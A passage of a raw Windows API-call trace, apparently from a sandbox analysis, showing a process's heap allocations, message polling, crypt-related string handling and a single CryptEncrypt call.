RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd90 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0033.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0033.175] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.175] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0033.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0033.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0033.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0033.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0033.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0033.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0033.176] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0033.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0033.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0033.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0033.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0033.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0033.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0033.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0033.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0033.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0033.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0033.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0033.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0033.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0033.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0033.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0033.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.177] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0033.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0033.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0033.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0033.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0033.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0033.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0033.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0033.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0033.177] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0033.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0033.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0033.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0033.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0033.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.178] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0033.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0033.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.178] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0033.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0033.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0033.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0033.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0033.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0033.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0033.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0033.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0033.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0033.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0033.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0033.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0033.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0033.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0033.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0033.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0033.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0033.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0033.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0033.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0033.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0033.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0033.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0033.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0033.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0033.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0033.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0033.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0033.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0033.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0033.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0033.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0033.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0033.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0033.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0033.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0033.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0033.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0033.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0033.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0033.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0033.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0033.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0033.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0033.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0033.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0033.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0033.181] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0033.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0033.181] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da368, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da368*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0033.181] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.181] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.181] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.181] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.181] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.181] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.181] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.181] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.181] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0033.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0033.181] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.182] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0033.182] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.182] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.182] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.182] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0033.182] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.182] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0033.182] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.182] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.182] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.182] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0033.182] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.182] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0033.182] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.183] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.183] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x8860, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x8870) returned 1 [0033.183] PeekMessageW 